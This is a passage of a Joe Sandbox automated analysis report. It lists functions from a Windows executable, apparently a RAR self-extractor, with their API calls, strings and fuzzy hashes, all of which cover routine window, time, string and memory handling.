
Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcslen
String ID: U|$p|$z|
API String ID: 176396367-1077559926
Opcode ID: f39c5998f41fb1447709326e96b6d1d5849049eb0bebfa6098cc10c0c4a6e550
Instruction ID: 37412f8136e179c79ebab3d0e8c38311697e9da181d719d01cbc408adbacd9a8
Opcode Fuzzy Hash: f39c5998f41fb1447709326e96b6d1d5849049eb0bebfa6098cc10c0c4a6e550
Instruction Fuzzy Hash: 0E41B671A006699BCB119F688C19AEE7BBCEF05310F40406EFD45F7241DB38AE558BE5

Function 007C9ED5 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 114COMMON

Download Yara Rule

APIs

ShowWindow.USER32(?,00000000), ref: 007C9EEE
GetWindowRect.USER32(?,00000000), ref: 007C9F44
ShowWindow.USER32(?,00000005,00000000), ref: 007C9FDB
SetWindowTextW.USER32(?,00000000), ref: 007C9FE3
ShowWindow.USER32(00000000,00000005), ref: 007C9FF9

Strings

|, xrefs: 007C9F52, 007C9F87
RarHtmlClassName, xrefs: 007C9FA5

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Window$Show$RectText
String ID: |$RarHtmlClassName
API String ID: 3937224194-1363736506
Opcode ID: 976f640f42b3dbf244e427f48e878fc59a4067b9ddb5026e8e07ab6c8f4d9c4e
Instruction ID: 0ca85277fe5011f7079cdf7dd244aa7494d8db635ff31eceaeea632897705c30
Opcode Fuzzy Hash: 976f640f42b3dbf244e427f48e878fc59a4067b9ddb5026e8e07ab6c8f4d9c4e
Instruction Fuzzy Hash: 1841BF31104214FFCB615F649C4CFAB7BA8FF48745F00856DF9499A156EB38DA44CB62

Function 007C1218 Relevance: 12.1, APIs: 8, Instructions: 125timeCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 007C122E

Part of subcall function 007BB146: GetVersionExW.KERNEL32(?), ref: 007BB16B

FileTimeToLocalFileTime.KERNEL32(00000003,00000000,00000003,?,00000064,00000000,00000000,?), ref: 007C1251
FileTimeToSystemTime.KERNEL32(00000003,?,00000003,?,00000064,00000000,00000000,?), ref: 007C1263
SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 007C1274
SystemTimeToFileTime.KERNEL32(?,?), ref: 007C1284
SystemTimeToFileTime.KERNEL32(?,?), ref: 007C1294
FileTimeToSystemTime.KERNEL32(?,?,?), ref: 007C12CF
__aullrem.LIBCMT ref: 007C1379

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
String ID:
API String ID: 1247370737-0
Opcode ID: d4502bcf454a4fc3c4a367746971cabb26fd3e9e5a341a6c493cc7763bdf0a24
Instruction ID: 33d387011e4ca6e5f8f94bc309b8eb1c4b33699cce68320a30174e1b7660f865
Opcode Fuzzy Hash: d4502bcf454a4fc3c4a367746971cabb26fd3e9e5a341a6c493cc7763bdf0a24
Instruction Fuzzy Hash: 544106B1508345AFC710DF65C884A6BBBF9FF88314F50892EF596C6211E738E649CB52

Function 007B2210 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 468COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 007B2536

Part of subcall function 007B4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007B40A5

Part of subcall function 007C05DA: _wcslen.LIBCMT ref: 007C05E0

Strings

x%u, xrefs: 007B26FD
xc%u, xrefs: 007B275A
;%u, xrefs: 007B2523

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: __vswprintf_c_l_swprintf_wcslen
String ID: ;%u$x%u$xc%u
API String ID: 3053425827-2277559157
Opcode ID: 3cd603c4bb1296a8ddc7e638b8de904c89642a4898ea614f771d106bd398a4b1
Instruction ID: beae9d576a5894d95f18d8bf0f4470ad7ff617bb6d493afabc90afbd65d0bc7e
Opcode Fuzzy Hash: 3cd603c4bb1296a8ddc7e638b8de904c89642a4898ea614f771d106bd398a4b1
Instruction Fuzzy Hash: D8F13970605340DBDB25EB2484D9BFE77996FA0300F08456DFD869B283DB6C994AC7A2

Function 007C9CFE Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 183COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007C9D0A

Strings

<style>, xrefs: 007C9E30
</p>, xrefs: 007C9DE8
>, xrefs: 007C9D4B
</style>, xrefs: 007C9E52
<br>, xrefs: 007C9DFE

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcslen
String ID: </p>$</style>$<br>$<style>$>
API String ID: 176396367-3568243669
Opcode ID: 5b78986890d6a7e73fde5db4751e0902d65903f1286a607b973f7842fca7cab3
Instruction ID: 9b41869b622d57a56920405afda26e4b8f09bc0e4a4fe5478cb7a458856676d3
Opcode Fuzzy Hash: 5b78986890d6a7e73fde5db4751e0902d65903f1286a607b973f7842fca7cab3
Instruction Fuzzy Hash: 6A51275770136291DBB09A159819F7673E0DFA1750F58042EFB829B2C0FB6D8D4182A1

Function 007DF68D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,007DFE02,00000000,00000000,00000000,00000000,00000000,?), ref: 007DF6CF
__fassign.LIBCMT ref: 007DF74A
__fassign.LIBCMT ref: 007DF765
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 007DF78B
WriteFile.KERNEL32(?,00000000,00000000,007DFE02,00000000,?,?,?,?,?,?,?,?,?,007DFE02,00000000), ref: 007DF7AA
WriteFile.KERNEL32(?,00000000,00000001,007DFE02,00000000,?,?,?,?,?,?,?,?,?,007DFE02,00000000), ref: 007DF7E3

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: f84b75a258af631c2ed556e2368e40dd4e7e3d6e18abf1b8d42e2c05995742c2
Instruction ID: 9ea312329f320c65e47095d7c2ca4d1ce49dd1a1adaeed147ffc2edbff6aaa3d
Opcode Fuzzy Hash: f84b75a258af631c2ed556e2368e40dd4e7e3d6e18abf1b8d42e2c05995742c2
Instruction Fuzzy Hash: 1D5182B19002499FDB10CFA8DC85AEEBBF9FF09310F14416AE556E7351E734AA41CBA1

Function 007CCE87 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000800,?), ref: 007CCE9D

Part of subcall function 007BB690: _wcslen.LIBCMT ref: 007BB696

_swprintf.LIBCMT ref: 007CCED1

Part of subcall function 007B4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 007B40A5

SetDlgItemTextW.USER32(?,00000066,007F946A), ref: 007CCEF1
_wcschr.LIBVCRUNTIME ref: 007CCF22
EndDialog.USER32(?,00000001), ref: 007CCFFE

Strings

%s%s%u, xrefs: 007CCEC6

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr_wcslen
String ID: %s%s%u
API String ID: 689974011-1360425832
Opcode ID: 17bda7ef49c32ce5ddd4179a8555b1196840e303ff448732fb5f12c91e75c095
Instruction ID: 17a43247fab33800fbd64666c23489695db409c2f26e96fcf00c275522e1abc3
Opcode Fuzzy Hash: 17bda7ef49c32ce5ddd4179a8555b1196840e303ff448732fb5f12c91e75c095
Instruction Fuzzy Hash: 884160B1900658EADF219B60CC55FFA77BCEB04304F4080AEFA09E7141EB789A44CF65

Function 007D2900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 007D2937
___except_validate_context_record.LIBVCRUNTIME ref: 007D293F
_ValidateLocalCookies.LIBCMT ref: 007D29C8
__IsNonwritableInCurrentImage.LIBCMT ref: 007D29F3
_ValidateLocalCookies.LIBCMT ref: 007D2A48

Strings

csm, xrefs: 007D29DD

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 0198d88e3049f62c3dba380269f2f90947f947ed35514f79e758027a16e619b0
Instruction ID: 902ef33ebe807b45b1768ffd6ff4ce664e7a05a27bfd4ac105320df815776636
Opcode Fuzzy Hash: 0198d88e3049f62c3dba380269f2f90947f947ed35514f79e758027a16e619b0
Instruction Fuzzy Hash: E041A234A00258EFCF10DF68C895A9E7BB5EF54324F14C056E8156B393D739AA03CB91

Function 007C9955 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 106COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 007C995E
_wcslen.LIBCMT ref: 007C9993

Strings

<style>body{font-family:"Arial";font-size:12;}</style>, xrefs: 007C9987
 , xrefs: 007C9A21
, xrefs: 007C99B0
<br>, xrefs: 007C99DF

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _wcslen
String ID: $ $<br>$<style>body{font-family:"Arial";font-size:12;}</style>
API String ID: 176396367-3743748572
Opcode ID: 238ec7612b88afe3ec8b18080566c3c478c50ad794a40f8f2c86af7b0c169746
Instruction ID: 9be8ec7295629fb79b271b57477778fa31d2800cbd95773991aa671f1c5ff1b3
Opcode Fuzzy Hash: 238ec7612b88afe3ec8b18080566c3c478c50ad794a40f8f2c86af7b0c169746
Instruction Fuzzy Hash: B9313B7264434596DA70AB949C4AF7E73B4EB90720F50C41FFA86572D0FA6CED41C3A1

Function 007DC8A4 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 007DC868: _free.LIBCMT ref: 007DC891

_free.LIBCMT ref: 007DC8F2

Part of subcall function 007D8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007DC896,007E3A34,00000000,007E3A34,00000000,?,007DC8BD,007E3A34,00000007,007E3A34,?,007DCCBA,007E3A34), ref: 007D8DE2
Part of subcall function 007D8DCC: GetLastError.KERNEL32(007E3A34,?,007DC896,007E3A34,00000000,007E3A34,00000000,?,007DC8BD,007E3A34,00000007,007E3A34,?,007DCCBA,007E3A34,007E3A34), ref: 007D8DF4

_free.LIBCMT ref: 007DC8FD
_free.LIBCMT ref: 007DC908
_free.LIBCMT ref: 007DC95C
_free.LIBCMT ref: 007DC967
_free.LIBCMT ref: 007DC972
_free.LIBCMT ref: 007DC97D

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction ID: 374951d1cb49dd39dd0e5dda82152c101032b6aeed1a8ad17f84860550db960a
Opcode Fuzzy Hash: bf1448b5a367794c459becf00bdc5ad94e8d71ea07fb2ac2ae3d8aaabc3cc25b
Instruction Fuzzy Hash: 91113D71680B05FAE522B7B1CC0BFCB7BBD9F48B00F400D16B29D66292DA69B505D791

Function 007CE5EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,007CE669,007CE5CC,007CE86D), ref: 007CE605
GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 007CE61B
GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 007CE630

Strings

ReleaseSRWLockExclusive, xrefs: 007CE625
AcquireSRWLockExclusive, xrefs: 007CE615
KERNEL32.DLL, xrefs: 007CE600

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 6a52b01ee0fe6282066da02b738972ae0b037c0ffcd56a1e2263fbd13a975ec4
Instruction ID: 3d089b82cb279cbb0fbf8448a854248e0a93f8734c78eeaf59a7b1cedf6564c7
Opcode Fuzzy Hash: 6a52b01ee0fe6282066da02b738972ae0b037c0ffcd56a1e2263fbd13a975ec4
Instruction Fuzzy Hash: FFF0C2727A3AA25B4F314FA95C89FAA23DEAF29755300443DDA05F7100EB2CCD545AD4

Function 007D8900 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 007D891E

Part of subcall function 007D8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,007DC896,007E3A34,00000000,007E3A34,00000000,?,007DC8BD,007E3A34,00000007,007E3A34,?,007DCCBA,007E3A34), ref: 007D8DE2
Part of subcall function 007D8DCC: GetLastError.KERNEL32(007E3A34,?,007DC896,007E3A34,00000000,007E3A34,00000000,?,007DC8BD,007E3A34,00000007,007E3A34,?,007DCCBA,007E3A34,007E3A34), ref: 007D8DF4

_free.LIBCMT ref: 007D8930
_free.LIBCMT ref: 007D8943
_free.LIBCMT ref: 007D8954
_free.LIBCMT ref: 007D8965

Strings

p~, xrefs: 007D8914

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: p~
API String ID: 776569668-2570613599
Opcode ID: 4b755019792c2be19862d9484955c5abf29b557a9de87627a8d3fe839aa961bd
Instruction ID: a0bca6c44a4c361c508ba05c7fc223d313995546a28c8867c1cf6a009ea1e990
Opcode Fuzzy Hash: 4b755019792c2be19862d9484955c5abf29b557a9de87627a8d3fe839aa961bd
Instruction Fuzzy Hash: 8BF09A70901126EB86826F28FC024993BBAFB2C7103018A0BF044463F5CB3E49618BC2

Function 007C146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32(?,?), ref: 007C14C2

Part of subcall function 007BB146: GetVersionExW.KERNEL32(?), ref: 007BB16B

LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007C14E6
FileTimeToSystemTime.KERNEL32(?,?), ref: 007C1500
TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 007C1513
SystemTimeToFileTime.KERNEL32(?,?), ref: 007C1523
SystemTimeToFileTime.KERNEL32(?,?), ref: 007C1533

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: c509db09994308f1cded0f2fab0a7de4cbefef36bf45337106b138bdbb0d6d80
Instruction ID: 8744811f9b4148283dd79f72409139edd1ff5ecb70bddba01e7e9d0a754e2be5
Opcode Fuzzy Hash: c509db09994308f1cded0f2fab0a7de4cbefef36bf45337106b138bdbb0d6d80
Instruction Fuzzy Hash: 1B31FA75108349ABC704DFA8D88499BB7F8BF9C714F40892EF995C7210E734D609CBA6

Function 007D2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,007D2AF1,007D02FC,007CFA34), ref: 007D2B08
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 007D2B16
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 007D2B2F
SetLastError.KERNEL32(00000000,007D2AF1,007D02FC,007CFA34), ref: 007D2B81

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a6210d4b4968867e6cc7d25dd55b1b860bf8b1aebfed97d8fd89ceb872050951
Instruction ID: 7bc05e9e7219edbf1408fa090a798bce5264a195fc11e95f61f9fa44c1c43cb4
Opcode Fuzzy Hash: a6210d4b4968867e6cc7d25dd55b1b860bf8b1aebfed97d8fd89ceb872050951
Instruction Fuzzy Hash: 1901F17220A311AEA7142A746C899262B7AEF267747304A3BF0105D2E2FE9D4C039648

Function 007D97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,007F1030,007D4674,007F1030,?,?,007D3F73,00000050,?,007F1030,00000200), ref: 007D97E9
_free.LIBCMT ref: 007D981C
_free.LIBCMT ref: 007D9844
SetLastError.KERNEL32(00000000,?,007F1030,00000200), ref: 007D9851
SetLastError.KERNEL32(00000000,?,007F1030,00000200), ref: 007D985D
_abort.LIBCMT ref: 007D9863

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: b156070ee05c85993ff6630bca69feb9f912c5280fa87a5bb2bb9457e2139daa
Instruction ID: 831c372ecb80c9e541cd79eb4e1dc8f4d0f0a721dfef1affc12fc821fe3af7ec
Opcode Fuzzy Hash: b156070ee05c85993ff6630bca69feb9f912c5280fa87a5bb2bb9457e2139daa
Instruction Fuzzy Hash: 32F0F435200601B6C79233247C4EA1B1A7A9FDAF30F204126F714EB3D2EE2C88019569

Function 007CDC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,0000000A), ref: 007CDC47
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 007CDC61
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 007CDC72
TranslateMessage.USER32(?), ref: 007CDC7C
DispatchMessageW.USER32(?), ref: 007CDC86
WaitForSingleObject.KERNEL32(?,0000000A), ref: 007CDC91

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
